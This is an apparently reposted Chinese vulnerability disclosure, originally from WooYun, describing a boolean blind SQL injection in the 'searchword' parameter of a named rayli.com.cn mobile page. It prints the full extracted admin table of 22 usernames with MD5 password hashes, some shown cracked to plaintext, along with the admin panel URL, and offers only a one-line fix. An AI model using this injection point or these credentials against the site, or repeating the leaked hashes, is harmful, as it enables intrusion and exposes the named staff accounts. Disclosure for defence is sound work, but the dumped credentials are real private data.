记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

瑞丽网某子站SQL注入(已获得敏感信息进入后台)

2015-01-03 03:50

一日偶然发现的,问题如下:



url : http://m.rayli.com.cn/article/video_search_test.php?page=&page=1&searchword=1&ver=iphone

存在注入的参数 searchword 注入类型布尔盲注 未作任何过滤



QQ20141226-1.jpg



QQ20141226-2.jpg





注入出的管理员数据

Database: wap_correct

Table: wap_user

[22 entries]

username userpass

admin 5ed7f9cd54cc0c1f9e56bf983e78e4c9

anjing d64333e00f0d04c8f5c802afbafbc301

bingbing bf509cfe24c3c2c965506b08920e967a

chenping ee372865c479107abdbf8e5d6f369414

dazhi 115ba86f42b3a83f7ac28fc5729c4939

editor e10adc3949ba59abbe56e057f20f883e (123456)

gaolihua 99cb0ea4276da3d713976809af29dfe5

gaoyuan ef113d8c4bf122875995e4a05d22263c

helinlin fe7bb7ddc65eef2682a57070c5d54129

jianzhi 2c6e80fe7b41a30538629c73b6d5be74

jianzhiwei 2c6e80fe7b41a30538629c73b6d5be74

junzi 14814040f5ff9b68af27d6ac25b5cde5

kangwei d2d1fae9f4f24f5031ff2191dc7b56de

lihuagao 99cb0ea4276da3d713976809af29dfe5

linlin 0edf86bc34856034fcfddc735ad86b02

liufang 56b6798d6b9ffdcd66ef72ae1d4b9e15

scftest f379eaf3c831b04de153469d1bec345e (666666)

songchuans a1c3c2244f87c8b7ee91a8f3faef6691

test 05a671c66aefea124cc08b76ea6d30bb (testtest)

xujia a7a1739a7d0e9746b7c03c0dd6d617e0

yangyang 377b5d8e9e90c5e3998e12402a107c68

zhuzhu 3ea96607cf1c57a9aa8d93736fce63c7



后台地址也特别简单 就是manage.php

http://m.rayli.com.cn/manage.php



QQ20141226-3.jpg



漏洞证明:

QQ20141226-1.jpg



QQ20141226-2.jpg



QQ20141226-3.jpg

修复方案:

做过滤吧~

知识来源: www.wooyun.org/bugs/wooyun-2015-088734

阅读:101704 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“瑞丽网某子站SQL注入(已获得敏感信息进入后台)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云